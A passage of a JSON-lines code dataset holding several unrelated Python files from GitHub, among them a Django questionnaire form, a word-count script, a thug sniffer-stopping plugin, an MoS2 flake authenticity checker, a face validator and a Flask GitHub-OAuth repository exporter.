3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_3' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_4' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_5' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'further_comments' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(FollowUpForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper(self)\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-sm-3 col-md-3 col-lg-3'\n self.helper.field_class = 'col-sm-9 col-md-9 col-lg-9'\n self.helper.layout = Layout(\n Div(\n Div(\n HTML(_('1. Familiarity')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"

How familiar are you with the case of {{ form.instance.case.name }} in the one year period after {{ form.instance.case.date_intervention }}?

\")),\n 'familiarity',\n HTML(_(\"

Note: Even if you only have little or incomplete information, please try to answer all questions based on the knowledge you have.

\")),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('2. Development of the situation')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"

How would you describe the development of the case of {{ form.instance.case.name }} in the one year period after {{ form.instance.case.date_intervention }}, in light of the incidents listed above that occurred before the action of the Special Rapporteur?

\")),\n HTML(_(\"

We recommend you look at this table to ensure consistency in responses. The table lists various examples and explains how to rate developments of a case depending on the initial situation.

\")),\n 'rating',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('3. Significant incidents')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"

Please list all known significant incidents that occurred in the one year period after {{ form.instance.case.date_intervention }}. If there were more than 5, please concentrate on the most important ones:

\")),\n TabHolder(\n Tab(\n _('Incident #1'),\n 'incident_date_1',\n 'incident_text_1'\n ),\n Tab(\n _('Incident #2'),\n 'incident_date_2',\n 'incident_text_2',\n ),\n Tab(\n _('Incident #3'),\n 'incident_date_3',\n 'incident_text_3',\n ),\n Tab(\n _('Incident #4'),\n 'incident_date_4',\n 'incident_text_4',\n ),\n Tab(\n _('Incident #5'),\n 'incident_date_5',\n 'incident_text_5',\n ),\n ),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('4. International attention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"

Do you believe that the international attention given to the case of {{ form.instance.case.name }} had an impact on the development of his/her situation in the one year period after {{ form.instance.case.date_intervention }}?

\")),\n 'attention',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('5. Special Rapporteur\\'s intervention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"

Do you believe that the intervention of the Special Rapporteur had a distinguishable impact on this case (amidst broader international attention)?

\")),\n 'intervention',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('6. Impact of the attention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_('

Please provide as much detail as possible on what makes you come to your conclusion on question (4) and (5), as well as on what kind of impact the attention had (if any):

')),\n 'impact',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('7. Further comments/feedback')),\n css_class = 'panel-heading'\n ),\n Div(\n 'further_comments',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('8. Voluntary contact information')),\n css_class = 'panel-heading'\n ),\n Div(\n 'want_informed',\n 'contact_again',\n 'email_address',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('Submission')),\n css_class = 'panel-heading'\n ),\n Div(\n Alert(content=_('Warning! You can only submit this form once. After your submission the link will be deactivated.'), css_class=\"alert-danger\"),\n HTML(_(\"

Thank you for your contribution!

\")),\n StrictButton(_('Submit '), type='submit', name='save', css_class=\"btn-primary\"),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-primary'\n ),\n )\n\n def clean(self):\n super(FollowUpForm,self).clean()\n if bool(self.cleaned_data['want_informed']) or bool(self.cleaned_data['contact_again']):\n try:\n validate_email(self.cleaned_data['email_address'])\n except ValidationError:\n raise ValidationError(_(\"Please fill the e-mail address field if you wish to receive information.\"))\n\n def save(self, commit=True, *args, **kwargs):\n instance = super(FollowUpForm, self).save(commit=False, *args, **kwargs)\n instance.timestamp = timezone.now()\n instance.is_answered = True\n if commit:\n instance.save()\n return instance\n \n","repo_name":"simonspa/django-datacollect","sub_path":"datacollect/questionnaire/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11842379450","text":"# -*- codeing = utf-8 -*-\n# @Time : 2023/4/11 9:44\n# @Author : LHJ青梦\n# @File : demo03.py\n# @Software: PyCharm\n\n\nimport jieba\nf = open(\"沉默的羔羊.txt\", 'r', encoding='utf-8')\nls = jieba.lcut(f.read())\n\n#ls = f.read().split()\nd = {}\nfor w in ls:\n d[w] = d.get(w, 0) + 1\n'''\n# print(type(ls))\nprint(ls)\nprint('-----------------')\n# print(type(d))\nprint(d)\nprint('--------------------')\n'''\nmaxc = 0\nmaxw = \"\"\nfor k in d:\n if d[k] > maxc and len(k) > 2:\n maxc = d[k]\n maxw = k\n if d[k] == maxc and len(k) > 2 and k > maxw:\n maxw = k\nprint(maxw)\nf.close()\n\n'''\n这段代码是一个简单的文本分析程序,目的是找到一个文本中出现次数最多的词语。\n\n具体的解释如下:\n\n导入了 jieba 模块,用于对文本进行分词。\n打开一个名为 \"沉默的羔羊.txt\" 的文件。\n通过 jieba.lcut() 函数对文件内容进行分词,得到一个分词列表 ls。\n创建一个空字典 d,用于存储每个词语出现的次数。\n遍历分词列表 ls,对于每个词语 w,如果 w 已经在字典 d 中,就将其出现次数加一,否则将其添加到字典 d 中,并将其出现次数初始化为 1。\n创建两个变量 maxc 和 maxw,用于记录出现次数最多的词语和该词语的出现次数。\n再次遍历字典 d,对于每个词语 k,如果 k 的出现次数大于 maxc 且 k 的长度大于 2,就将 maxc 和 maxw 更新为当前的值。如果 k 的出现次数等于 maxc 且 k 的长度大于 2 且 k 的字典序比 maxw 大,就将 maxw 更新为当前的值。\n输出出现次数最多的词语 maxw。\n关闭文件。\n'''","repo_name":"Leshj2003/python","sub_path":"code/Learning/序列数据结构、集合及字典/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28935750291","text":"#!/usr/bin/env python\n#\n# StartSniffer.py\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n\n\nimport base64\nimport os\nimport zope.interface\nfrom .IPlugin import IPlugin\n\nclass Handler:\n zope.interface.implements(IPlugin)\n\n def run(self, thug, log):\n log.info(\"[Plugins][StopSniffer] Stopping sniffer\")\n sniffer = getattr(log, 'sniffer', None)\n if sniffer and not sniffer.poll():\n try:\n log.debug(\"[Plugins][StopSniffer] Gracefully terminating process\")\n sniffer.terminate()\n log.debug(\"[Plugins][StopSniffer] Process terminated gracefully\")\n except:\n try:\n if not sniffer.poll():\n log.debug(\"[Plugins][StopSniffer] Killing sniffer\")\n sniffer.kill()\n except OSError as e:\n log.debug(\"[Plugins][StopSniffer] Error killing sniffer: %s. Continue\", e)\n pass\n except Exception as e:\n log.exception(\"[Plugins][StopSniffer] Unable to stop the sniffer with pid %d: %s\",\n sniffer.pid, e)\n\n mongoLogger = log.ThugLogging.modules.get('mongodb', None)\n if mongoLogger and mongoLogger.enabled:\n db = mongoLogger.urls.database\n if os.path.isfile(log.sniffer_filename):\n with open(log.sniffer_filename, 'rb') as i:\n content = i.read()\n\n os.unlink(log.sniffer_filename)\n\n content_id = mongoLogger.fs.put(base64.b64encode(content)) if content else None\n pcap = {\n 'analysis_id' : mongoLogger.analysis_id,\n 'content_id' : content_id,\n 'mime-type' : 'application/vnd.tcpdump.pcap',\n }\n db.pcaps.insert(pcap)\n\n log.info(\"[Plugins][StopSniffer] PCAP successfully added to Mongo\")\n","repo_name":"pdelsante/thug-dockerfile","sub_path":"Plugins/StopSniffer.py","file_name":"StopSniffer.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7771914360","text":"#import modules\nimport cv2 #pip install opencv-ython\nimport os\nimport mahotas #pip install mahotas\nimport numpy as np #pip install numpy\nimport glob\nfrom scipy.spatial import distance as dist #pip install scipy\nfrom matplotlib import pyplot as plt #pip install matplotlib\nimport csv\n\n#define function to return contour and Zernike moments from an image of a nanosheet\n#Note MoS2 image dataset requires erosion and dilation of 1 pixel from external contour to prevent merging of neighbouring features\ndef get_moments(filename):\n zernikeMoments = [] #initialise list to store zernike moments\n \n image = cv2.imread(filename) #read image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale\n blurred = cv2.GaussianBlur(gray, (7, 7), 2.5) #blur\n thresh = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1] #convert to binary\n \n #find contours, sort by area, grab largest contour\n cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n sorted_cnts = sorted(cnts, key=cv2.contourArea, reverse = True)\n cnts = sorted_cnts[0]\n \n #create an empty mask for the contour and draw filled contour\n mask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.drawContours(mask, [cnts], -1, 255, -1)\n \n #extract bounding rectangle of contour, use it to crop roi from mask.\n (x, y, w, h) = cv2.boundingRect(cnts)\n roi = mask[y:y + h, x:x + w]\n\n kernel = np.ones((3,3), np.uint8) #set kernel\n\n mask = cv2.erode(mask, kernel) #erode 1 pixel from external contour\n\n #find contours, sort by area, grab largest contour\n cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n sorted_cnts = sorted(cnts, key=cv2.contourArea, reverse = True)\n cnts = sorted_cnts[0]\n\n #create an empty mask for the contour and draw filled contour\n mask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.drawContours(mask, [cnts], -1, 255, -1)\n\n mask = cv2.dilate(mask, kernel) #dilate 1 pixel to external contour\n\n #extract bounding rectangle of contour, use it to crop roi from mask.\n (x, y, w, h) = cv2.boundingRect(cnts)\n roi = mask[y:y + h, x:x + w]\n\n #compute Zernike Moments from roi, add to list.\n zMoments = mahotas.features.zernike_moments(mask, cv2.minEnclosingCircle(cnts)[1], degree=8)\n zMoments = zMoments[2:] #exlude first 2 Zernike moments for translation invariance\n zernikeMoments.append(zMoments)\n \n #return contour and its Zernike moments\n return (cnts, zernikeMoments)\n\n#define function to return L, W, A and L/W from a nanosheet contour\ndef measure_size(flake_contour):\n #calculate pixel size and area\n pixel_size = 1.0 / image_scale # in um\n pixel_area = pixel_size**2 #in um^2\n \n #calculate flake area in pixels and convert to um^2.\n flake_area = cv2.contourArea(flake_contour) #counts all pixels in contour\n flake_area = flake_area * pixel_area #unit conversion to um^2\n\n #Calculate flake L, W and L/W\n bounding_rect = cv2.minAreaRect(flake_contour) #create bounding rectangle with minimum area around contour\n (x,y), (w,h), angle = bounding_rect #x,y centre points of rectangle, w h, width and height of rectangle in pixels\n #take largest rectangle dimension as L and the shorter as W\n if h > w:\n lateral_size = h\n width = w\n else: \n lateral_size = w \n width = h\n lateral_size = lateral_size * pixel_size #convert units from pixels to um\n width = width * pixel_size #converts units from pixels to um\n \n ratio = lateral_size / width #compute aspect ratio\n\n return flake_area, lateral_size, width, ratio\n\nimage_scale = 12.9 #set image scale in pixels/um (measure from scale bar)\n\n#Define Reference Image i.e. nanosheet to check for authenticity\nref_filename = \"MoS2 Nanotag Duplicate/Duplicate MoS2 67.tif\" #define filepath\nrefImage = cv2.imread(ref_filename) \n\n#Get contours and zernike moments of the reference flake\n(refcnts, refZernikeMoment) = get_moments(ref_filename)\n\n#Define empty lists to store results\nimage_name_list = []\nzernike_distance_list = []\nsize_list = []\nwidth_list = []\narea_list = []\naspect_ratio_list = []\nzernike_list = []\n\n#Apply each function to each image in a defined folder of genuine nanotags\nfor filename in glob.glob('MoS2 Nanotags/*.tif'):\n \n #trim filename from filepath, append to list removing extension (.tif)\n head, tail = os.path.split(filename)\n image_name_list.append(tail[:-4])\n \n #get contours and Zernike moments from image\n (cnts, zernikeMoments) = get_moments(filename)\n zernike_list.append(zernikeMoments) #append moments to results list\n\n #compute zernike moment distances\n zmd = dist.cdist(refZernikeMoment, zernikeMoments) #calculate Euclidean distance between reference image moments and current image moments\n zernike_distance_list.append(zmd[0,0])\n \n #measure A, L, W, L/W from flake contour\n area, lateral_size, width, ratio = measure_size(cnts)\n\n #append all results to lists\n area_list.append(area)\n size_list.append(lateral_size)\n width_list.append(width)\n aspect_ratio_list.append(ratio)\n\n#find index of lowest ZMD i.e. most similar genuine flake to the reference image \nj = np.argmin(zernike_distance_list)\nprint(f\"The lowest zernike distance match to the scanned flake is: {image_name_list[j]}\") #print most similar genuine imaage name to terminal\nprint(f\"The zernike moment distance of this pair is: {zernike_distance_list[j]}\") #print ZMD score to terminal\n\n#make decision\nif zernike_distance_list[j] < 0.0315: #if the zernike distance is below the threshold (see manuscript) \n print(\"The scanned flake is genuine.\") #print decision to terminal\nelse: print(\"Sorry, the scanned flake is not in our dataset.\") #print decision to terminal\n\n#Load the most similar genuine image to the reference image\nmatch = cv2.imread(f\"{head}/{image_name_list[j]}.tif\")\n\n#define figure with set rows and columns\nfig = plt.figure(figsize=(6,3))\nrows = 1\ncolumns = 3\n\nfig.add_subplot(rows, columns, 1) #to position 1 in the figure\nplt.imshow(cv2.cvtColor(refImage, cv2.COLOR_BGR2RGB)) #load reference image, convert BGR to RGB to ensure correct colour in cv2.\nplt.axis('off') #turn off axis\nplt.title(\"Reference Image\") #add title\n\nfig.add_subplot(rows, columns, 2) #to position 2 in the figure\nplt.imshow(cv2.cvtColor(match, cv2.COLOR_BGR2RGB)) #load most similar image, convert BGR to RGB to ensure correct colour in cv2.\nplt.axis('off') #turn off axis\nplt.title(\"Most similar Flake\") #add title\n\nfig.add_subplot(rows, columns, 3) #to position 3 in the figure\n\n#if reference matches a genuine nanosheet\nif zernike_distance_list[j] < 0.0315: \n blank = np.ones(match.shape) #add blank white image with same dimensions as matched image\n plt.imshow(blank) #add image to position 3\n plt.axis('off') #turn off axis\n plt.title(\"Flake is legitimate.\") #add heading to show flake is legitmate.\n\n#if reference does not match genuine nanosheet\nelse:\n blank = np.ones(match.shape) #add blank white image with same dimension as matched image\n plt.imshow(blank) #add image to position 3\n plt.axis('off') #turn off axis\n plt.title(\"Flake is counterfeit.\") #add heading to show no match was found\n\nplt.tight_layout() #use tight layout\nplt.show() #show the final figure\n\n#----------COMPUTE ZMD SCORE OF ALL UNIQUE PAIRS--------------------#\n#only enable this code if all results are needed for the dataset\n\n#define empty list to store zernike moment distance for each flake pairing\nzernike_difference_list = []\n\n#nested for loop ensuring every contour is compared with every contour and itself, but not repeated. e.g. 00, 01, 02... 11, 12, 13... 22, 23, 24...\nfor i in range(len(zernike_list)):\n zernike_diff = dist.cdist(zernike_list[i], zernike_list[i]) #calculate euclidean distance between moments of all pairs of identical images (ZMD = 0) e.g FLake 1 Flake 1\n zernike_difference_list.append(zernike_diff[0,0]) #append result to list\n\n for j in range(i+1, len(zernike_list)):\n zernike_diff = dist.cdist(zernike_list[i], zernike_list[j]) #calculate Euclidean distance between moments of all unique image pairs e.g Flake 1 FLake 2\n zernike_difference_list.append(zernike_diff[0,0])\n\n#define list to store compared name strings\nname_compare_list = [] \n\n#nested for loop ensuring we create new string from both image names compared, for each unique image pairing\nfor i in range(len(image_name_list)):\n names_compared = str(f\"{image_name_list[i]} {image_name_list[i]}\") #between every pair of identical images e.g FLake 1 Flake 1\n name_compare_list.append(names_compared)\n for j in range(i+1, len(image_name_list)):\n names_compared = str(f\"{image_name_list[i]} {image_name_list[j]}\") #between every unique pair of images e.g FLake 1 Flake 2\n name_compare_list.append(names_compared)\n\n\n#--------------EXPORT FLAKE PARAMETERS TO .CSV FILE, ENABLE IF NEEDED-------------------#\n#Create tab delimited .csv file tabulating flake morphological parameter data\nheaders = [\"Flake Number\", \"Lateral Size / nm\", \"Width / nm\", \"Area / um^2\", \"L/W Aspect Ratio\"] #define collumn headers\nwith open('MoS2 Flake Parameters.csv', 'w', newline = '') as file: #create new .csv tab delimited document with specified file name ensuring no gaps between rows\n writer = csv.writer(file, delimiter='\\t')\n dw = csv.DictWriter(file, delimiter = '\\t', fieldnames=headers)\n dw.writeheader()\n writer.writerows(zip(image_name_list, size_list, width_list, area_list, aspect_ratio_list)) #zip results lists and write row by row\n\n#create tab delimiter .csv file tabulating ZMD scores and names\nheaders = [\"Flakes compared\", \"ZMD Score\"] #define collumn headers\nwith open('MoS2 Nanotag ZMD scores.csv', 'w', newline = '') as file: #create new .csv tab delimited document with specified file name ensuring no gaps between rows\n writer = csv.writer(file, delimiter='\\t')\n dw = csv.DictWriter(file, delimiter = '\\t', fieldnames=headers)\n dw.writeheader()\n writer.writerows(zip(name_compare_list, zernike_difference_list)) #zip results lists and write row by row\n","repo_name":"ORead15/2DM-Anticounterfeiting","sub_path":"Authenticity Check MoS2.py","file_name":"Authenticity Check MoS2.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34646381007","text":"from face_detection.FaceModel import FaceModel\nfrom face_detection.ShapeAnalizer import ShapeAnalizer\n\n\nclass FaceModelValidator:\n __MAX_PERCENT_DIFFERENCE_IN_EYES_WIDTH = 7\n\n def __init__(self, shape_analizer: ShapeAnalizer, mandatory_face_height_percent: int) -> None:\n self.__shape_analizer = shape_analizer\n self.__mandatory_face_height_percent = mandatory_face_height_percent\n\n def is_valid(self, image, model: FaceModel) -> bool:\n if not model.has_detection() or not self.__is_face_proportion_right(image, model)\\\n or not self.__are_eyes_width_equal(model):\n return False\n\n return True\n\n def __is_face_proportion_right(self, image, model: FaceModel) -> bool:\n face_height = self.__shape_analizer.get_height(model.all_points)\n image_height, _ = image.shape[:2]\n minimum_accepted_height = int(image_height * self.__mandatory_face_height_percent / 100)\n\n return face_height >= minimum_accepted_height\n\n def __are_eyes_width_equal(self, model: FaceModel) -> bool:\n left_eye_width = self.__shape_analizer.get_width(model.get_left_eye())\n right_eye_width = self.__shape_analizer.get_width(model.get_right_eye())\n if left_eye_width - right_eye_width == 0:\n return True\n percent_difference_in_width = int((\n abs(left_eye_width - right_eye_width) /\n max(left_eye_width, right_eye_width)\n ) * 100)\n\n return percent_difference_in_width <= self.__MAX_PERCENT_DIFFERENCE_IN_EYES_WIDTH","repo_name":"danionescu0/image-processing-projects","sub_path":"eye-mouth-remote-controll/face_detection/FaceModelValidator.py","file_name":"FaceModelValidator.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"29010954619","text":"from flask import Flask, request, redirect, session, url_for, render_template, Response\nimport requests\nfrom urllib.parse import urlencode, parse_qs\nimport os\nimport psycopg2\nimport csv\nimport io\n\napp = Flask(__name__)\n\n# loading env data\ntry:\n from dotenv import load_dotenv\n\n load_dotenv()\nexcept Exception as err:\n print(err)\n\napp.secret_key = os.environ.get(\"SECRET_KEY\")\ngithub_client_id = os.environ.get(\"CLIENT_ID\")\ngithub_client_secret = os.environ.get(\"CLIENT_SECRET\")\nhosting_url = \"http://localhost:5000\"\n\n\n@app.route(\"/\")\ndef home():\n # checks if user has already logged in\n # the session contains the owner_id of the user if he has logged in\n if \"logged_in\" in session:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n cursor = conn.cursor()\n\n select_query = \"\"\"\n SELECT repo_info.id, repo_info.name, repo_info.status, repo_info.stars, repo_info.forks\n FROM user_info\n INNER JOIN repo_info ON user_info.owner_id = repo_info.owner_id\n WHERE user_info.owner_id = %s\n \"\"\"\n select_values = (session[\"logged_in\"],)\n # Execute the query\n cursor.execute(select_query, select_values)\n\n # Fetch all the results\n repo_results = cursor.fetchall()\n\n select_query = \"SELECT * FROM user_info WHERE owner_id = %s\"\n select_values = (session[\"logged_in\"],)\n cursor.execute(select_query, select_values)\n user_data = cursor.fetchone()\n\n # Close the database connection\n cursor.close()\n conn.close()\n\n return render_template(\n \"home.html\", repo_results=repo_results, user_data=user_data\n )\n\n # the error occured in callback process is stored in sesssion\n elif \"error\" in session:\n return render_template(\"login.html\", error_msg=session[\"error\"])\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n # the owner id is removed from session\n session.pop(\"logged_in\", None)\n return redirect(url_for(\"home\"))\n\n\n@app.route(\"/login\")\ndef login():\n params = {\n \"client_id\": github_client_id,\n \"redirect_uri\": hosting_url + \"/callback\",\n \"scope\": \"repo\",\n }\n return redirect(f\"https://github.com/login/oauth/authorize?{urlencode(params)}\")\n\n\n@app.route(\"/callback\")\ndef callback():\n code = request.args.get(\"code\")\n data = {\n \"client_id\": github_client_id,\n \"client_secret\": github_client_secret,\n \"code\": code,\n \"redirect_uri\": hosting_url + \"/callback\",\n }\n response = requests.post(\n \"https://github.com/login/oauth/access_token\",\n data=data,\n headers={\"Accept\": \"application/json\"},\n )\n\n access_token = response.json()[\"access_token\"]\n\n headers = {\n \"Authorization\": f\"Bearer {access_token}\",\n \"Accept\": \"application/vnd.github.v3+json\",\n }\n\n user_info_response = requests.get(\"https://api.github.com/user\", headers=headers)\n repo_info_response = requests.get(\n \"https://api.github.com/user/repos\", headers=headers\n )\n\n # putting data in postgres if response is success\n if user_info_response.status_code == 200 and repo_info_response.status_code == 200:\n userdata = user_info_response.json()\n repodata = repo_info_response.json()\n\n avatar_url = userdata[\"avatar_url\"]\n followers_count = int(userdata[\"followers\"])\n following_count = int(userdata[\"following\"])\n userid = userdata[\"login\"]\n bio = userdata[\"bio\"]\n email = userdata[\"email\"]\n owner_id = str(userdata[\"id\"])\n name = userdata[\"name\"]\n\n repo_list = []\n for repo in repo_info_response.json():\n if repo[\"owner\"][\"login\"] == userid:\n repo_list.append(\n {\n \"id\": repo[\"id\"],\n \"name\": repo[\"name\"],\n \"status\": repo[\"visibility\"],\n \"stars\": repo[\"stargazers_count\"],\n \"forks\": repo[\"forks_count\"],\n }\n )\n\n try:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n cursor = conn.cursor()\n\n create_query = \"\"\"CREATE TABLE IF NOT EXISTS user_info (\n avatar_url VARCHAR(255),\n followers_count INTEGER,\n following_count INTEGER,\n userid VARCHAR(255),\n bio VARCHAR(255),\n email VARCHAR(255),\n owner_id VARCHAR(255) PRIMARY KEY,\n name VARCHAR(255)\n );\"\"\"\n cursor.execute(create_query)\n\n # Define the SELECT query to check if data already exists\n select_query = \"SELECT COUNT(*) FROM user_info WHERE owner_id = %s\"\n select_values = (owner_id,)\n cursor.execute(select_query, select_values)\n count = cursor.fetchone()[0]\n\n if count > 0:\n # Data already exists, so update it\n update_query = \"UPDATE user_info SET avatar_url = %s, followers_count = %s, following_count = %s, userid = %s, bio = %s, email = %s, name = %s WHERE owner_id = %s\"\n update_values = (\n avatar_url,\n followers_count,\n following_count,\n userid,\n bio,\n email,\n name,\n owner_id,\n )\n cursor.execute(update_query, update_values)\n else:\n # Data doesn't exist, so insert it\n insert_query = \"INSERT INTO user_info (avatar_url, followers_count, following_count, userid, bio, email, owner_id, name) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n insert_values = (\n avatar_url,\n followers_count,\n following_count,\n userid,\n bio,\n email,\n owner_id,\n name,\n )\n cursor.execute(insert_query, insert_values)\n\n conn.commit()\n\n # Create the repo_info table if it doesn't exist\n create_table_query = \"\"\"\n CREATE TABLE IF NOT EXISTS repo_info (\n owner_id VARCHAR(255) REFERENCES user_info(owner_id),\n id VARCHAR(255) PRIMARY KEY,\n name VARCHAR(255),\n status VARCHAR(255),\n stars INTEGER,\n forks INTEGER\n )\n \"\"\"\n cursor.execute(create_table_query)\n\n for repo in repo_list:\n id = str(repo[\"id\"])\n name = repo[\"name\"]\n status = repo[\"status\"]\n stars = int(repo[\"stars\"])\n forks = int(repo[\"forks\"])\n\n select_query = \"SELECT COUNT(*) FROM repo_info WHERE id = %s\"\n select_values = (id,)\n cursor.execute(select_query, select_values)\n count = cursor.fetchone()[0]\n\n if count > 0:\n # Repo data already exists, so update it\n update_query = \"UPDATE repo_info SET name = %s, status = %s, stars = %s, forks = %s WHERE id = %s\"\n update_values = (name, status, stars, forks, id)\n cursor.execute(update_query, update_values)\n\n else:\n # Repo data does not exist, so insert a new record\n insert_query = \"INSERT INTO repo_info (owner_id, id, name, status, stars, forks) VALUES (%s, %s, %s, %s, %s, %s)\"\n insert_values = (owner_id, id, name, status, stars, forks)\n cursor.execute(insert_query, insert_values)\n\n conn.commit()\n cursor.close()\n conn.close()\n\n session.pop(\"error\", None)\n except:\n print(\"DB Error\")\n session[\"error\"] = \"Database Error\"\n\n if \"error\" not in session:\n session[\"logged_in\"] = owner_id\n else:\n session[\"error\"] = str(user_info_response.status_code) + \" \" + \"Error\"\n\n return redirect(url_for(\"home\"))\n\n\n@app.route(\"/download\")\ndef download():\n if \"logged_in\" in session:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n\n csv_filename = session[\"logged_in\"] + \".csv\"\n csv_buffer = io.StringIO()\n csv_writer = csv.writer(csv_buffer)\n\n # writing header\n csv_writer.writerow(\n [\n \"Owner ID\",\n \"Owner Name\",\n \"Owner Email\",\n \"Repo ID\",\n \"Repo Name\",\n \"Status\",\n \"Stars Count\",\n ]\n )\n\n # Fetch the data from the user_info and repo_info tables and write it to the CSV file\n cursor = conn.cursor()\n select_query = \"\"\"\n SELECT u.owner_id, u.name, u.email, r.id, r.name, r.status, r.stars \n FROM user_info u INNER JOIN repo_info r ON u.owner_id = r.owner_id\n WHERE u.owner_id = %s\n \"\"\"\n select_values = (session[\"logged_in\"],)\n cursor.execute(select_query, select_values)\n rows = cursor.fetchall()\n\n for row in rows:\n # If email is NULL, replace it with an empty string\n email = row[2] if row[2] is not None else \"\"\n csv_writer.writerow([row[0], row[1], email, row[3], row[4], row[5], row[6]])\n\n cursor.close()\n conn.close()\n\n # Create a Flask response object to return the CSV file as a download\n csv_output = csv_buffer.getvalue()\n response = Response(csv_output, mimetype=\"text/csv\")\n response.headers.set(\n \"Content-Disposition\", f\"attachment; filename={csv_filename}\"\n )\n return response\n\n else:\n return redirect(url_for(\"home\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"thenithinbalaji/Repolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22598882321","text":"import pandas as pd\r\nimport numpy as np\r\nimport time,datetime\r\nfrom datetime import datetime, timedelta\r\nimport yaml\r\nimport os\r\nfrom openpyxl import load_workbook\r\n# folder to load config file\r\nCONFIG_PATH = \"./Data initializers/\"\r\n# Function to load yaml configuration file\r\ndef load_config(config_name):\r\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\r\n config = yaml.safe_load(file)\r\n return config\r\n\r\nconfig = load_config(\"data_loader_results.yaml\")\r\n# load data\r\ntype_description = pd.read_excel(os.path.join(config[\"data_directory\"], config[\"data_name\"]),sheet_name=config['sheet_type_description'])\r\n\r\ntype_list = sorted(type_description[config['type']].unique())\r\n\r\nfor t in range(len(type_list)):\r\n type= type_description[type_description[config['type']] == type_list[t]]\r\n description = sorted(type[config['description']].unique())\r\n cell_list= type[config['cell_id']].unique()\r\n Matrix = np.zeros(shape=(len(description), len(description)), dtype=float)\r\n for i in range(len(description)):\r\n description_number = 0\r\n for cell in cell_list:\r\n type_cell = type[type[config['cell_id']] == cell]\r\n interval_list = type_cell[config['interval_number']].unique()\r\n for interval in interval_list:\r\n type_cell_interval = type_cell[type_cell[config['interval_number']] == interval]\r\n type_cell_interval = type_cell_interval.reset_index(drop=True)\r\n for l in range(len(type_cell_interval) - 1):\r\n if (type_cell_interval.loc[l, config['description']] == description[i]):\r\n description_number = description_number + 1\r\n for j in range(len(description)):\r\n transition_number = 0\r\n for cell in cell_list:\r\n type_cell = type[type[config['cell_id']] == cell]\r\n interval_list = type_cell[config['interval_number']].unique()\r\n for interval in interval_list:\r\n type_cell_interval = type_cell[type_cell[config['interval_number']] == interval]\r\n type_cell_interval 